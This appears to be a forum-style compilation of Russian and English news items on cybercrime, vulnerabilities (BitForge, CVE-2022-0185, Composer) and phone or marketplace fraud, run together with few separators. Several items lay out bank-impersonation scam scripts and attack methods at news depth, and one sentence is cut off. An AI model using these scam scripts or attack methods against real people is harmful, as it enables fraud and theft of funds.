Адвокат в суде рассказал, что Зайдуллин от силовиков не скрывался. А то, что он находится не в России, еще, мол, ничего не значит. «Он не скрывался от правоохранительных органов. Согласно представленным в суд материалам, его выезд за пределы РФ был осуществлен за достаточно продолжительное время до возбуждения уголовного дела. Поэтому связывать его выезд с намерением скрыться [неверно]», — сообщал защитник на судебном заседании, где присутствовал и корреспондент «БИЗНЕС Online».
Кроме того, рассказал адвокат Некрасов суду, уголовное дело возбуждено по трем эпизодам, а обвинение Зайдуллину предъявили только по одному. Это, по его мнению, говорит о том, что у следствия недостаточно доказательств и делать вывод о причастности менеджера банка к преступлению «преждевременно». «Мы полагаем, что на сегодняшний день как объявление в розыск, так и привлечение в качестве обвиняемого являются преждевременными», — заявил адвокат. Тем не менее ВС РТ оставил решение о заочном аресте в силе. Срок ареста будет исчисляться с момента задержания в РФ или экстрадиции из-за границы.
В разговоре с «БИЗНЕС Online» адвокат Некрасов отказался от комментариев, в том числе и на вопрос о том, признает ли Зайдуллин вину. Мы дозвонились до отца подозреваемого, однако тот не стал ничего говорить о сыне и уголовном деле. «Пока идет следствие, никто ничего не знает, гадать на кофейной гуще не будем, — сказал Булат Зайдуллин. — После суда все вопросы».
На ИБ-конференции BlackHat эксперты Fireblocks рассказали о двух уязвимостях (CVE-2023-33241 и CVE-2023-33242) в криптографических протоколах, используемых криптовалютными кошельками MPC (включая Binance, Coinbase и ZenGo). Уязвимости, получившие общее название [BitForge](https://www.fireblocks.com/press/fireblocks-researchers-uncover- vulnerabilities-impacting-dozens-of-major-wallet-providers), позволяют злоумышленникам восстанавливать seed-фразы и похищать средства владельцев кошельков.
Проблемы были выявлены в составе широко используемых криптографических протоколов GG-18, GG-20 и Lindell 17, то есть затрагивают многие популярные криптовалютные кошельки.
Для упомянутых выше Binance, Coinbase и ZenGo уже вышли патчи. Однако исследователи предупреждают, что десятки других кошельков остаются уязвимыми перед BitForge, и подготовили специальный инструмент для проверки проектов, чтобы разработчики могли узнать, подвержены ли они рискам из-за проблемной имплементации MPC.
Первая уязвимость (CVE-2023-33241) затрагивает TSS (Threshold Signature Schemes) в протоколах GG18 и GG20, которые считаются основополагающими для индустрии MPC-кошельков, позволяя нескольким сторонам генерировать ключи и совместно подписывать транзакции.
Fireblock объясняет, что в зависимости от параметров имплементации злоумышленник может отправить специально подготовленное сообщение и извлечь шарды ключа в виде 16-битных фрагментов, таким образом извлекая из кошелька весь приватный ключ за 16 повторений.
«Эксплуатация этой уязвимости позволяет злоумышленнику, взаимодействующему с участниками TSS, похитить их секретные шарды и в итоге получить приватный мастер-ключ, — говорится в отчете Fireblock. — Серьезность уязвимости зависит от параметров имплементации, поэтому выбор разных параметров приводит к разным атакам, и для извлечения полного ключа необходима разная степень усилий и ресурсы».
Click to expand...
Вторая уязвимость, обнаруженная в протоколе Lindell17 2PC (CVE-2023-33242), имеет аналогичную природу и позволяет злоумышленнику извлечь весь приватный ключ примерно за 200 попыток подписи.
Корень проблемы кроется в имплементации 2PC, а не в самом протоколе, и проявляется в некорректной работе кошельков с прерываниями, что вынуждает их продолжать подписывать операции, которые раскрывают биты приватного ключа.
Атака, использующая этот баг, является асимметричной, то есть может быть использована как против клиента, так и против сервера.
В первом случае злоумышленник атакует клиента, заставляя его посылать команды серверу от своего имени, что приводит к раскрытию части приватного ключа сервера. По данным исследователей, на сбор достаточно количества данных для восстановления полного приватного ключа, необходимо 256 таких попыток. Поскольку ограничений не существует, атакующий может отправить серверу множество быстрых последовательных запросов, и атака может быть реализована за короткое время.
Второй сценарий атаки нацелен на приватный ключ клиента. В этом случае взломанный сервер получает его с помощью специально подготовленных сообщений. Эта атака так же требует примерно 256 запросов для извлечения полного ключа.
Исследователи уже опубликовали на GitHub два PoC-эксплоита (1, 2) для каждой из уязвимостей.
Новозеландский регистратор InternetNZ, отвечающих за доменную зону ".NZ", [предупредил](https://internetnz.nz/news-and-articles/dnssec-chain-validation- issue-for-nz-second-level-domain/) об инциденте, в результате которого возникли массовые сбои в разрешении доменных имён в зоне ".nz" и 15 связанных вторичных зонах, таких как "co.nz" и "net.nz". Причиной сбоя стала ошибка, допущенная при ротации KSK-ключей (Key Signing Key), применяемых для цифровой подписи записей DNSKEY, содержащих ключи для подписи доменной зоны (ZSK, Zone Signing Key). После инцидента на DNS-серверах, применяющих DNSSEC для проверки достоверности данных, перестали определяться все домены в зоне ".nz" (попытка определения приводит к возвращению сервером ошибки SERVFAIL).
Регистратор доменной зоны ".nz" внедрил DNSSEC более десяти лет назад, и с тех пор ежегодная ротация ключей превратилась в рутину. В этом году ротация была выполнена в привычном режиме, но администраторы не обратили внимание, что в конце прошлого года была внедрена новая информационная система регистратора, в которой формат ключей немного отличался от прошлой, и данное отличие не было выявлено во время тестирования и интеграции новой платформы. Администраторы не учли наличие отличий и предварительно не протестировали процесс ротации в новых условиях, что привело к тому, что при определении имён на DNS-серверах перестала проходить проверка цифровых подписей с использованием KSK-ключа корневой зоны.
Проблема усугубляется тем, что ошибочные записи с ключами осели в кешах DNS- серверов, и для оперативного возобновления нормальной работы администраторам рекурсивных серверов требуется вручную очистить кэш (обычно достаточно перезапустить DNS-сервер). В противном случае для возобновления определения доменов ".nz" необходимо ждать завершения срока действия записей DNSSEC, время жизни которых для зоны ".nz" выставлено в 48 часов (инцидент произошёл вечером 29 мая, поэтому для истечения времени жизни записи придётся ждать более суток).
Весной эстонская полиция провела крупнейшую международную операцию, в ходе которой в шести странах был конфискован 51 сервер, что как минимум временно парализовало работу 21 криминального кол-центра, действующего в Украине.
За последние три года жертвами телефонных мошенников стали почти 1000 эстонцев, а причиненный злоумышленниками ущерб превышает 15 миллионов евро. Если раньше казалось, что после начала войны в Украине звонки прекратились, то теперь жалобы в полицию поступают ежедневно. Почему этот вид преступности носит настолько массовый характер и его практически невозможно остановить?
Одна из жертв телефонных мошенников - назовем ее Леаной (50) - живет в маленьком эстонском городке и по работе контактирует с большим количеством людей, поэтому ее настоящее имя не разглашается. Она одна примерно из тысячи эстонцев, кого за последние три года полностью "обчистили" телефонные мошенники. Ежегодный ущерб исчисляется миллионами.
И это относится не только к Эстонии: мошеннические звонки являются серьезной проблемой во многих крупных странах. В частности, гражданам США, Канады и других англоязычных стран постоянно поступают звонки из мошеннических кол- центров, расположенных в Индии. Существует очень много методов обмана. Леана, например, стала жертвой так называемого банковского мошенничества.
Вечером 4 ноября Леане позвонил человек, представившийся сотрудником Swedbank. "Мошенник говорил на русском языке. Он спросил, все ли в порядке с моей банковской картой, подчеркнув, что есть опасность того, что мои деньги украдут", - рассказала Леана.
"Это самый распространенный сценарий. Звонящий представляется сотрудником банка. Причем злоумышленники довольно часто маскируют номер телефона - он может выглядеть точно так же, как официальный номер кол-центра Swedbank. Более того, на некоторых устройствах может появиться название банка. К сожалению, сегодняшние технические возможности позволяют совершать такие мошенничества",
Широкая общественность не знает, что уже в феврале 2020 года полиция создала специальную следственную группу, которая приступила к картированию сети телефонных мошенников. Используя методы, о которых нельзя говорить публично, расследователям удалось взломать системы злоумышленников.
Из мошеннического кол-центра позвонили и Леане. В телефоне было указано, что звонят с номера Swedbank, также мошенникам было известно полное имя женщины и то, что она является клиентом именно этого банка. Есть несколько способов получить эту информацию. Один из них - липовые розыгрыши. Победителю обещают квартиру или машину, но настоящая цель - данные участников.
Первый звонивший связал Леану с человеком, представившимся сотрудником внутреннего контроля Swedbank. Злоумышленник утверждал, что для защиты банковского счета женщины пришлось заблокировать транзакции, и нужно переустановить систему интернет-банка.
"Если человек называет свое имя пользователя для идентификации, а затем мошенники говорят, что отправят на ваш телефон подтверждение, которое необходимо подтвердить с помощью PIN1, то мы знаем, что вас идентифицировали. В этот момент злоумышленник находится в вашем интернет-банке", - объяснил Рауль Вахтра.
Он подчеркнул, что, во-первых, в большинстве случаев мошенники не говорят по- эстонски, в то время как сотрудники эстонских банков могут общаться на государственном языке. Даже если это не их родной язык. Во-вторых, они никогда не просят идентифицировать себя подобным образом. Более того, подозрительную транзакцию можно остановить без запроса клиента.
По словам Леаны, тогда она была особенно рассеянной и уязвимой, поскольку ее дочь находилась в больнице. В общей сложности потерпевшая трижды ввела пароли через Smart-ID или PIN-калькулятор. Каждый раз средства переводились на другие счета.
Но это было только начало. Мошенники утверждали, что счет Леаны в Coop Bank также находится под угрозой.
Мошенник, звонивший якобы из Coop Bank, потребовал, чтобы женщина прислала фотографию своей ID-карты. Помимо того, что звонившие украли с ее счета все деньги - 600 евро, также на имя потерпевшей был взят кредит в размере 5000 евро.
Украденные со счетов обоих банков деньги были переведены на счет некой Натальи в LHV Bank. Впоследствии полиция установила, что она тоже была потерпевшей.
Но на этом история не закончилась. На следующее утро мнимый сотрудник Swedbank позвонил Леане с новой историей.
Женщине сказали, что в банке, вероятно, действует коррумпированный сотрудник, для раскрытия которого нужна помощь: необходимо провести секретную операцию. Жертве сказали, что "в рамках операции" на ее имя возьмут кредит у третьего банка - SEB. Ее задачей было передать деньги наличными, и после этого предполагаемого мошенника должны были схватить.
Леана поехала в Таллинн и фактически оформила кредит в размере 10 000 евро в банке SEB, но поскольку у нее счет в другом банке, потребовалась выписка из Swedbank. Женщина проверила остаток своего счета и увидела, что на нем нет средств.
Потерпевшая написала заявления и в банки, и в полицию. Общий убыток составил почти 10 000 евро. Леана не единственная, кто поверил в подобную историю. Количество жертв увеличивалось.
Полиция идет по следам мошенников
После двухлетнего расследования в апреле этого года была проведена операция, в ходе которой был конфискован 51 сервер в Германии, Нидерландах, Латвии, Финляндии, Франции и Украине.
"Оказалось, что у мошенников есть база данных. Мы увидели, как и какую именно информацию они собирают. Мы увидели, что люди фотографируют свои документы. Причем было много снимков жителей Эстонии, на которых они стоят с документом в руках и фотографируются. Это говорит о том, что число пострадавших определенно больше, чем нам известно. Не все сообщили о случившемся в полицию. Мы попытались идентифицировать их и связаться с ними, чтобы узнать, жертвой какого мошенничества они стали", - сказал глава криминального бюро Пыхьяской префектуры Урмет Тамбре.
Это крупнейшая международная полицейская операция, организованная под руководством эстонцев, и расследование с самым большим объемом данных в Эстонии. В общей сложности было получено 300 терабайт информации.
К своему удивлению, расследователи обнаружили, что группа называла себя Stratton Oakmont - печально известной американской брокерской фирмой, которая грабила клиентов.
Среди прочего материала были получены видеоролики, где сотрудники кол-центра общались сами с собой, со своей техподдержкой или записывали свои занятия и звонки.
Известно, что Stratton Oakmont в Украине состояла из 21 кол-центра, где ежедневно работали 400 человек. Их конторы располагались по всей Украине, но штаб-квартира находилась в Днепре. Их жертвами стали не менее 30 000 человек из 71 страны, но большинство из них - граждане России. В настоящее время исследование материалов еще не закончено, но пока удалось выявить 20 ведущих фигур, 18 из которых имеют прямую связь с жертвами из Эстонии. Осенью эта информация будет передана в Украину.
source: rus.err.ee/1608708763/v-hode-masshtabnoj-operacii-policija-zaderzhala- dejstvujuwij-v-ukraine-moshennicheskij-kol-centr
QNAP принудительно обновила NAS-устройства после атаки вымогателя DeadBolt
Операторы вымогательского ПО успешно зашифровали более 3,6 тыс. устройств.
Компания QNAP в принудительном порядке обновила сетевые устройства хранения данных (NAS) клиентов для защиты от программы-вымогателя DeadBolt, которая зашифровала более 3,6 тыс. устройств.
Операторы вымогателя предположительно эксплуатируют уязвимость нулевого дня для взлома устройств QNAP и шифрования файлов с помощью DeadBolt, который добавляет расширение .deadbolt к именам файлов. Вымогатель также заменяет обычную HTML-страницу авторизации в систему запиской требования выкупа в размере 0,03 биткойна (около $1,1 тыс.) в обмен на ключ дешифрования и восстановления данных.
Вымогательская группировка DeadBolt пыталась продать полную информацию о предполагаемой уязвимости нулевого дня в QNAP за 5 биткойнов (около $185 тыс.). Киберпреступники также готовы были продать QNAP главный ключ дешифрования, который может расшифровать всех атакованные устройства и предоставить информацию о предполагаемой уязвимости нулевого дня за 50 биткойнов (примерно $1,85 млн).
Сразу после атаки QNAP начала предупреждать клиентов о необходимости защитить свои устройства NAS, подключенные к интернету, обновив программное обеспечение QTS до последней версии, а также отключив UPnP и переадресацию портов. Позже в тот же день QNAP предприняла более решительные действия и принудительно обновила прошивку для всех устройств NAS клиентов до последней версии 5.0.0.1891 , выпущенной 23 декабря 2021 года.
По словам клиентов QNAP и системных администраторов, QNAP принудительно обновляет прошивку на устройствах, даже если автоматические обновления отключены. Однако обновление не прошло гладко, так как у некоторых пользователей перестали работать соединения iSCSI с устройствами.
Тем временем некоторые пользователи приобрели ключ дешифрования и находились в процессе восстановления данных. Они обнаружили, что обновление прошивки также удалило исполняемый файл программы-вымогателя и экран выкупа, используемый для инициации дешифрования. Это помешало им продолжить процесс расшифровки после завершения обновления устройства.
В API Filesystem Context, предоставляемым ядром Linux, выявлена уязвимость ([CVE-2022-0185](https://security- tracker.debian.org/tracker/CVE-2022-0185)), позволяющая локальному пользователю добиться получения прав root в системе. Выявивший проблему исследователь опубликовал демонстрацию работы эксплоита, позволяющего выполнить код с правами root в Ubuntu 20.04 в конфигурации по умолчанию. Код эксплоита планируется разместить на GitHub в течение недели после того, как дистрибутивы выпустят обновление с исправлением уязвимости.
Уязвимость присутствует в функции legacy_parse_param() в VFS и вызвана отсутствием должной проверки максимального размера параметров, предоставляемых в файловых системах, не поддерживающих API Filesystem Context. При передаче слишком большого параметра можно вызвать переполнение целочисленной переменной, используемой для расчета размера записываемых данных - в коде имеется проверка выхода за границу буфера "if (len > PAGE_SIZE - 2 - size)", которая не срабатывает, если значение size больше 4094 из-за целочисленного переполнения через нижнюю границу (integer underflow, при приведении 4096 - 2
Указанная ошибка позволяет при обращении к специально оформленному образу ФС вызвать переполнение буфера и перезаписать данные ядра, следующие за выделенной областью памяти. Для эксплуатации уязвимости требуется наличие прав CAP_SYS_ADMIN, т.е. полномочий администратора. Проблема в том, что подобные полномочия непривилегированный пользователь может получить в изолированном контейнере, если в системе включена поддержка пространств имён идентификаторов пользователей (user namespaces). Например, user namespaces по умолчанию включён в Ubuntu и Fedora, но не активирован в Debian и RHEL (если не используются платформы контейнерной изоляции). Кроме повышения привилегий уязвимость также может применяться для выхода из изолированного контейнера, при наличии в контейнере полномочий CAP_SYS_ADMIN.
Проблема проявляется начиная с ядра Linux 5.1 и устранена во вчерашних обновлениях 5.16.2, 5.15.16, 5.10.93, 5.4.173. Обновления пакетов с устранением уязвимости уже выпущены для RHEL, Debian, Fedora, Ubuntu. Исправление пока недоступно в Arch Linux, Gentoo, SUSE и openSUSE. В качестве обходного пути защиты для систем, не использующих контейнерную изоляцию можно выставить в 0 значение sysctl "user.max_user_namespaces":
Code:Copy to clipboard
echo "user.max_user_namespaces=0" > /etc/sysctl.d/userns.conf
# sysctl -p /etc/sysctl.d/userns.conf
Группа мошенниц с неподконтрольной территории Украины, разработала схему интернет-мошенничества. С учетом размаха преступного плана, организаторше понадобилась помощь нескольких сообщниц, включая приятельницу, работавшую почтальоном в одном из отделений Укрпочты города Херсон. Все участницы группировки имели долгую историю дружеских отношений и регулярно поддерживали связь при помощи интернета и мобильных мессенджеров.
На сайте OLX организаторша находила объявления о продаже бывших в употреблении вещей, которые размещали жители Украины. После этого, согласно заранее распределенным ролям, ее сообщница созванивалась с продавцами при помощи предварительно купленных абонентских номеров оператора «Водафон Украина».
Уверяя, что заинтересована в покупке, сообщница узнавала у продавцов их имена и номера банковских карт, на которые она могла бы оплатить товар. Все эти данные мошенница фиксировала и передавала организатору, чьей задачей было выдавать себя за сотрудницу банка.
Чтобы звонки от имени банков выглядели более убедительно, украинская почтальонша приобрела у оператора «Интертелеком» несколько номеров, которые имитировали стационарные номера Днепра и ряда других украинских городов и передала их сообщницам.
Представляясь сотрудницей банка-эмитента карты, одна из мошенниц сообщала OLX- продавцам, что на их карту были зачислены деньги от юридического лица и что это запрещено регламентом, поэтому все их счета заблокированы службой безопасности банка.
Чтобы разблокировать их, нужно подтвердить, что потерпевший является действительным владельцем карты, а для этого нужно правильно назвать ее номер, срок действия, код безопасности, указанный на обратной стороне карты и смс-код подтверждения, который пришлет банк.
В тот самый момент, когда напуганная жертва называла мошеннице все требуемые данные, та использовала их для перехвата управления интернет-банком. Получив доступ к счетам своих жертв, мошенница переводила все доступные средства на подконтрольные шайке банковские счета.
В задачи почтальонши входило подыскивать нуждающихся украинских граждан, на имя которых она, за вознаграждение, оформляла мобильные номера «Интертелекома» и банковские карты. Увидев, что похищенные у жертвы деньги поступили на подконтрольную ей карту, она давала отмашку «сотруднице банка» завершать разговор с жертвой, чтобы не дать последней возможность вовремя среагировать и принять меры против кражи.
Улов шайки был оценен правоохранителями как особо крупный. В материалах дела проходило около десятка потерпевших, которым мошенники нанесли ущерб, в отдельных эпизодах превышавший 71 тысячу гривен. Причем, большая часть этих денег, аккумулировалась «на руках» жительницы Херсона.
В результате проведенного расследования, правоохранители смогли выйти на след шайки и раскрыть входившую в нее украинскую почтальоншу. Деньги, находившиеся на подконтрольных ей счетах, были арестованы.
За свое участие в преступной группировке, единственная мошенница, оказавшаяся в пределах досягаемости украинской фемиды, была осуждена за нарушение ч.4 ст. 190 (мошенничество, совершенное группой лиц в особо крупных размерах).
В качестве наказания, судья определил ей лишение свободы, сроком на 5 лет, без конфискации имущества. Однако, данное наказание было заменено на 3 года испытательного срока, с обязанностью возместить потерпевшим ущерб, на общую сумму около 200 тысяч гривен, а также оплатить судебные издержки на проведение криминалистических экспертиз, в размере 16 тыс. грн.
Министерство юстиции США предъявило обвинения жителю Миннесоты Джошуа Стрейту (Joshua Streit), который взламывал учетные записи пользователей MLB, НБА, НФЛ, НХЛ, чтобы добыть контент для своего пиратского стримингового сайта.
Более того, Стрейта обвиняют во взломе компьютерных систем Главной лиги бейсбола (MLB) и попытке вымогательства у лиги 150 000 долларов. В противном случае Стрейт угрожал опубликовать данные об уязвимостях в системе безопасности MLB, с помощью которых он и скомпрометировал лигу.
В сети Стрейт был известен под никами и Josh Brody и inflx, и с августа 2017 года по август 2021 года он управлял пиратским сайтом спортивных трансляций HeHeStreams. Доступ к чужим учетным записям в системах MLB, НБА, НФЛ и НХЛ он использовал для перехвата трансляций игр, которые затем ретранслировал на своем сайте. Пиратские стримы были частью платного пакета. Так, подписка на HeHeStreams давала пользователям доступ к трансляциям игр четырех перечисленных спортивных лиг США по ценам ниже, чем на официальных сайтах. К примеру, неограниченные трансляции полного сезона игр MLB на HeHeStreams стоили 100 долларов в год.
В судебных документах подробно описано, как ФБР установило настоящую личность оператора HeHeStreams. Правоохранительным органам удалось отследить оператора сайта после того, как тот использовал один и тот же ник (inflx) как в чате HeHeStreams, так и на Reddit.
С помощью данных, полученных от администрации Reddit, следователи обнаружили, что учетная запись была зарегистрирована на адрес электронной почты, который Стрейт использовал для своего личного блога, где он часто публиковал различные ИБ-исследования. Затем, данные, предоставленные другими компаниями и поставщиками интернет-услуг, помогли установить точную связь между оператором HeHeStreams и домашним IP-адресом Стрейта.
Теперь Стрейту грозит до 60 лет тюрьмы, если он будет признан виновным по всем пунктам обвинения. MLB утверждает, что взлом ее систем повлек за собой убытки в размере трех миллионов долларов США, и эти деньги, обвиняемому, похоже, придется возместить.
• Source: justice[.]gov/usao-sdny/pr/minnesota-man-charged-computer-intrusion- and-illegally-streaming-content-four-major
• Source: .justice[.]gov/usao-sdny/press-release/file/1445136/download
Оперативниками отдела «К» УМВД России по Вологодской области при поддержке сотрудников Росгвардии задержаны злоумышленники, похищавшие денежные средства с банковских карт граждан.
В ходе оперативно-розыскных мероприятий установлено, что с февраля по апрель 2021 года мошенники находили размещенные на Интернет сайтах бесплатных объявлений и в крупной социальной сети объявления о продаже различного имущества. Они совершали телефонные звонки продавцам и предлагали совершить сделку, используя сервисы доставки товаров. При согласии продавца ему направлялась ссылка на Интернет страницу, якобы для получения денежных средств за продаваемое имущество. Переходя по ссылке, потерпевшие вводили данные банковских карт, в том числе код из sms-сообщений от банка и сумму денежных средств, равную стоимости товаров. Затем происходило списание денежных средств с банковских карт граждан на счета, к которым имели доступ злоумышленники. Благодаря оперативным действиям полицейских мошенники задержаны. Ими оказались 21-летний мужчина и 18-летняя девушка. В результате обыска, проведенного по месту жительства подозреваемых, обнаружены и изъяты мобильные устройства, компьютерная техника, банковские и сим-карты.
СУ УМВД России по г. Вологде возбуждены уголовные дела по признакам преступления, предусмотренного пунктом «г» части 3 статьи 158 УК РФ «Кража».
В настоящее время продолжается работа по установлению причастности указанных лиц к иным фактам противоправной деятельности.
Разработчики библиотеки fingerprintjs, позволяющей генерировать идентификаторы браузера в пассивном режиме на основе косвенных признаков, таких как разрешение экрана, особенностей WebGL, списки установленных плагинов и шрифтов, представили новый метод идентификации, основанный на оценке установленных у пользователя типовых приложений и работающий через проверку поддержки в браузере дополнительных обработчиков протоколов. Код скрипта с реализацией метода опубликован под лицензий MIT.
Проверка осуществляется на основе анализа привязки обработчиков к 32 популярным приложениями. Например, определив наличие в браузере обработчиков схем URL telegram://, slack:// и skype:// можно сделать вывод о наличии в системе приложений telegram, slack и skype, и использовать данную информацию в качестве признака при генерации идентификатора системы. Так как список обработчиков одинаков для всех браузеров в системе идентификатор не меняется при смене браузера и может применяться в Chrome, Firefox, Safari, Brave, Yandex Browser, Edge и даже в Tor Browser.
Метод позволяет генерировать 32-битные идентификаторы, т.е. по-отдельности не позволяет добиться большой точности, но имеет смысл как дополнительный признак в сочетании с другими параметрами. Ощутимым минусом метода является заметность попытки идентификации для пользователя - при генерации идентификатора на предложенной демонстрационной странице в правом нижнем углу открывается небольшое, но явно заметное окно в котором достаточно долго перебираются обработчики. Данный минус не проявляется в Tor Browser, в котором идентификатор может быть вычислен незаметно.
Для определения наличия приложения скрипт пытается открыть во всплывающем окне ссылку, связанную с внешним обработчиком, после чего браузер выводит диалог с предложением открыть содержимое в связанном приложении, если проверяемое приложение присутствует, или выдаёт страницу с ошибкой, если приложения нет в системе. Через последовательный перебор типовых внешних обработчиков и анализ возвращения ошибки можно сделать вывод о наличии в системе проверяемых программ.
В Chrome 90 для Linux метод не сработал и браузер на все попытки проверки обработчика вывел типовой диалог подтверждение операции (в Chromе для Windows и macOS метод работает). В Firefox 88 для Linux, как в обычном режиме, так и в режиме инкогнито, скрипт определил наличие установленных дополнительных приложений из списка, а точность идентификации оценена в 99.87% (35 подобных совпадений из 26 тысяч проведённых тестов). В запущенном на той же системе Tor Browser был сгенерирован идентификатор, совпадающий с тестом в Firefox.
Интересно, что дополнительная защита в Tor Browser сыграла злую шутку и обернулась возможностью провести идентификацию незаметно для пользователя. Из- за отключения в Tor Browser диалогов подтверждения использования внешних обработчиков проверочные запросы, оказалось, можно открывать в iframe, а не в popup-окне (для разделения наличия и отсутствия обработчиков используется то, что правила same-origin блокируют доступ к страницам с ошибкой и разрешают к страницам about:blank). Из-за защиты от флуда проверка в Tor Browser занимает заметно дольше времени (10 секунд на приложение).
Google this week announced yet another set of patches for Chrome, to address a total of 19 vulnerabilities affecting the web browser.
The latest Chrome iteration - 90.0.4430.212 – is available for Windows, Mac, and Linux users. The Android and iOS variants of the browser were updated as well.
Of the 19 security holes addressed with this release, 15 were reported by external researchers, including 13 considered high severity and two flaws rated medium severity.
Chrome components affected by these issues include Web App Installs, Offline, Media Feeds, Aura, Tab Groups, Notifications, V8, Autofill, File API, History, Reader Mode, Payments, and Tab Strip.
As per usual, the company isn’t sharing full details on the addressed bugs until fixes have been delivered to most users. In its [advisory](https://chromereleases.googleblog.com/2021/05/stable-channel- update-for-desktop.html), Google made no mention of any of these vulnerabilities being exploited in live attacks.
Over the past couple of months, however, the Internet search giant shipped patches for several zero-day vulnerabilities in the browser.
In March, Google released an urgent fix to address [CVE-2021-21193](https://www.securityweek.com/google-chrome-zero-day-under- attack-again), a zero-day for which an exploit had already been published. In April, the company shipped patches for [CVE-2021-21206 and CVE-2021-21220](https://www.securityweek.com/google-patches-more-under-attack- chome-zero-days) (in Chrome 89) and [CVE-2021-21224](https://www.securityweek.com/google-chrome-hit-another- mysterious-zero-day-attack) (Chrome 90).
In April, a proof-of-concept (PoC) exploit for a Chromium vulnerability (in the V8 JavaScript engine) [was published](https://www.securityweek.com/exploit-second-unpatched-chromium- flaw-made-public-just-after-first-patched) before patches were delivered to Chrome and Edge users. In late April, Google patched another [serious bug in V8](https://www.securityweek.com/google-patches-yet-another- serious-v8-vulnerability-chrome).
The maintainers of Composer, a package manager for PHP, have shipped an update to address a critical vulnerability that could have allowed an attacker to execute arbitrary commands and "backdoor every PHP package," resulting in a supply-chain attack.
Tracked as CVE-2021-29472, the security issue was discovered and reported on April 22 by researchers from [SonarSource](https://blog.sonarsource.com/php- supply-chain-attack-on-composer), following which a hotfix was deployed less than 12 hours later.
"Fixed command injection vulnerability in HgDriver/HgDownloader and hardened
other VCS drivers and downloaders," Composer
said
its release notes for versions
2.0.13 and 1.10.22 published on Wednesday. "To the best of our knowledge the
vulnerability has not been exploited."
Composer is billed as a
tool for dependency management in PHP, enabling easy installation of packages
relevant to a project. It also allows users to install PHP applications that
are available on Packagist, a repository that
aggregates all public PHP packages installable with Composer.
According to SonarSource, the vulnerability stems from the way package source download URLs are handled, potentially leading to a scenario where an adversary could trigger remote command injection. As proof of this behavior, the researchers exploited the argument injection flaw to craft a malicious Mercurial repository URL that takes advantage of its "alias" option to execute a shell command of the attacker's choice.
"A vulnerability in such a central component, serving more than 100 million package metadata requests per month, has a huge impact as this access could have been used to steal maintainers' credentials or to redirect package downloads to third-party servers delivering backdoored dependencies," SonarSource said.
The Geneva-based code security firm said one of the bugs was introduced in November 2011, suggesting that the vulnerable code lurked right from the time development on Composer started 10 years ago. The first "alpha" version of Composer was released on July 3, 2013.
"The impact to Composer users directly is limited as the composer.json file is typically under their own control and source download URLs can only be supplied by third party Composer repositories they explicitly trust to download and execute source code from, e.g. Composer plugins," Jordi Boggiano, one of the primary developers behind Composer, said.
22-летний студент Московского государственного университета Олег Т. был
арестован на 10 суток за название своей Wi-Fi сети "Slava Ukraine!". Парень
живет в общежитии ДСЛ и в прошлом году принимал участие в антивоенных
митингах.
6 марта полиция обнаружила в его общежитии сеть с таким названием и после осмотра комнаты Олега выяснила, что он создал ее сам после покупки нового роутера в октябре прошлого года.
На студента составили протокол по статье о публичном демонстрировании экстремистской символики (КоАП РФ 20.3), так как этот лозунг принадлежит националистам, деятельность которых в России запрещена.
В суде Олег признал, что сеть он настроил сам, и судья отправила его под арест на 10 суток. При этом роутер был конфискован как орудие совершения правонарушения. В случае повторного такого нарушения студенту может грозить уголовное дело.
Топ-менеджер ИБ-компании Securolytics признал свою вину во взломе компьютерной сети американской медицинской организации. В результате атаки, информацию о которой управленец-авантюрист намеревался использовать для привлечения новых клиентов, несколько больниц осталось без внутренней связи, что могло привести к человеческим жертвам. Сторона обвинения запросит для подсудимого 57 месяцев домашнего ареста вместо реального срока в связи с ужасным состоянием его здоровья.
Опасная и крайне неэтичная затея
Бывший главный операционный директор (COO) американской технологической компании Securolytics организовал кибератаки на несколько медицинских учреждений в США, сведения о которых в дальнейшем использовал для привлечения новых клиентов, пишет The Register.
Securolytics – поставщик сервисов сетевой безопасности со штаб-квартирой в Атланте (штат Джорджия, США), специализирующийся на обслуживании клиентов из сферы здравоохранения.
Согласно материалам дела, Викас Сингла (Vikas Singla), в прошлом топ-менеджер ИБ-компании Securolytics, в сентябре 2018 г. собственноручно удаленно вывел из строя инфраструктуру сети телефонной связи на базе оборудования Ascom в медицинском центре Northside Hospital Gwinnett, который управляет больницами в Лоренсевилле и Дулуте (штат Джорджия).
В результате более чем 200 телефонных аппаратов в больницах единовременно оказались неработоспособными, лишив врачей и остальной медицинский персонал возможности общения друг с другом по внутренним каналам связи. Наличие таких каналов связи критически важно, в частности, при реагировании на ситуации, в которых пациенты нуждаются в срочной помощи, например, вследствие внезапной остановки сердца.
Кроме того, Сингла проник в частную виртуальную сеть (VPN) медорганизации и, через нее получил доступ к больничному прибору для оцифровки и анализа маммографических снимков Hologic R2. Устройство, помимо результатов рентгенологического исследования, также хранит персональные данные пациентов, в том числе имена, даты рождения и пол.
Руководитель Securolytics затем извлек из медицинского прибора сведения о 300 проходивших исследование пациентах и сохранил в текстовом файле под названием “Baidu.txt”, который впоследстви синхронно вывел на печать в обоих филиалах учреждения, сопроводив сообщением со словами: “WE OWN YOU” («Мы владеем вами»). Всего в этой акции устрашения было задействовано более 200 принтеров организаций.
Выход в публичное поле
После этого Сингла осветил инцидент в соцсети X (ранее – Twitter) с использованием ныне деактивированного личного аккаунта, с позиции эксперта в области безопасности и не раскрывая факт собственной причастности к происшествию В общей сложности мужчина опубликовал 43 сообщения, в каждом из которых так или иначе фигурировали конфиденциальные данные пациентов, похищенные им с машины Hologic R2.
После публичного выступления Синглы Securolytics начала рассылать потенциальным клиентам электронные письма с предложением сотрудничества, ссылаясь на атаки, о которых ранее рассказал в интернете ее главный операционный директор.
Признать вину и избежать тюрьмы
В 2021 г. Сингле было предъявлено обвинение, в котором ему вменялось умышленное нанесение ущерба защищенному компьютеру (17 эпизодов), а также получение доступа к информации на защищенном компьютере (один эпизод). По заявлению стороны обвинения, действия экс-топ-менеджера Securolytics обернулись для медицинской структуры ущербом, который был оценен в $817 тыс.
В ноябре 2023 г. управленец-авантюрист признал свою вину в содеянном и согласился выплатить Northside Hospital Gwinnett и обслуживающей ее страховой компании ACE American Insurance Company все $817 тыс. в качестве компенсации материального ущерба.
Обвинение также пообещало не запрашивать у суда наказания, связанного с помещением Синглы в исправительные учреждения. Вместо этого прокурор порекомендует назначение испытательного срока продолжительностью 57 месяцев (около пяти лет), который виновному придется провести под домашним арестом.
Столь мягкое наказание предлагается стороной обвинения в связи с наличием у Синглы серьезных проблем со здоровьем: «редкой и неизлечимой формы рака», а также «потенциально опасным заболеванием сердечно-сосудистой системы».
